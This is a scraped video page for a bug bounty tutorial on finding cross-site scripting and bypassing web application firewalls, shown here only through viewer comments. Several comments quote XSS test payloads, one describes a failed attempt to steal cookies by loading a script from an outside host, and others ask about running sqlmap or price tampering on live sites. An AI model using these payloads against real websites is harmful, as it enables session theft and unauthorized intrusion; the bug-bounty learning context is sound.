Bug Bounty: Best Way To Find XSS & Bypass WAF | Live Demonstration

Bug Bounty: Best Way To Find XSS & Bypass WAF | Live Demonstration | 2024

Рет қаралды 28,271

BePractical

Күн бұрын

Пікірлер: 49

@Jamaal_Ahmed 5 ай бұрын

Wow its amazing , please make video after i got xss what next can i do .

@akroidofficial 5 ай бұрын

quality content. i always prefer manual rather than automated

@madhavanrio3210 4 ай бұрын

yeah dude automated tools are outdated now, because of WAF or other CDNs so try mannualy, and be unique from the crowd

@nishantdalvi9470 5 ай бұрын

Please make one more video in where we try bypassing WAF by inputting in equal to sign in our payload around the angular tags

@SecureByBhavesh 5 ай бұрын

Informative, Please make video on SQLi

@RyanGiggs-w7i 5 ай бұрын

Maybe u check in forget paswword for sqli

@Createrrahul1M Ай бұрын

Bro yeah to client side per ho reha he khud ke browsers me change se kya fark padega

@sir_potraheno3892 Ай бұрын

Thx, best video about xss

@Coollinux-c2b 3 ай бұрын

is the lab that you use available in docker? if yes can you share to us

@Jabir_AfreDy Ай бұрын

Please teach me how to do price tempering and how to know that this sites we can do price tempering

@codecore_111 3 ай бұрын

Bro u are a gem 💎

@shrabanichakraborty8147 3 ай бұрын

amazing . Make video on how to write bug bounty report

@studywork3779 Ай бұрын

sir if any value is not reflected in source code what shall we do

@sarthaksharma9721 3 ай бұрын

intruder allowed by website or not? plz reply

@Alpha_Aquila 5 ай бұрын

Please, I'm looking for that's video where you used Ngrok to demonstrate a vulnerability, please can you direct me there

@BePracticalTech 5 ай бұрын

Here you go: kzbin.info/www/bejne/hZPYY6aDm6qcipYfeature=shared

@Officialheartlessheart 5 ай бұрын

Please make a video on "XSS finding Methodology"

@wearecrypto9286 4 ай бұрын

Hi bro i didn't under that adding attributes step by encoding can you please clear it?

@ronicristian4648 5 ай бұрын

I have a case, about xss stored, when I input: '-alert(1)-' '-alert(document.domain)-' '-alert(document.cookie)-' The 3 payloads above successfully bring up the xss popup but when I input this payload to steal cookies, why doesn't it work? '-src="//example/c.js"-'

@BePracticalTech 5 ай бұрын

Maybe they have added a protection to prevent js code to read cookies

@TheCyberWarriorGuy 5 ай бұрын

Please make some tutorial on BACs !!!

@pak8380 5 ай бұрын

beautiful bro!!!!

@yasaya9139 5 ай бұрын

Please make a video xxe basic and next level

@asshu2004 5 ай бұрын

make some video on p1 bugs..

@pratapmahato3471 5 ай бұрын

Plz make video over sqlmap on live site not on test web

@BePracticalTech 5 ай бұрын

We already covered a lot of videos on sql injection that too on live websites. Check out our playlist: kzbin.info/aero/PLrQwMS8b1fmQkMnul6q06vvZL83BuK9Ud

@Arben_Short 2 ай бұрын

how to download your wallpaper

@animelover5849 5 ай бұрын

How to use subspy pip package

@jvr05 4 ай бұрын

this is very basic how about where //"" all of these are being detected and blocked ???

@uttarkhandcooltech1237 5 ай бұрын

Please share your window theme

@im_szaby9190 5 ай бұрын

how can i bypass html entity encoding

@jaywandery9269 5 ай бұрын

good one

@damnn_motivation 5 ай бұрын

Thanks bro

@khanshaheb4500 5 ай бұрын

Where is waf bypassing scenario?

@Free.Education786 5 ай бұрын

Excellent video 📹 brother. How to find vulnerable parameters and endpoints. I found many endpoints and parameters from paramspider collector parameth arjun x8, etc, but all of them failed in sqlmap or Ghauri because they are not injectable. How to solve this crucial problem. Thanks for your help and support. 🎉❤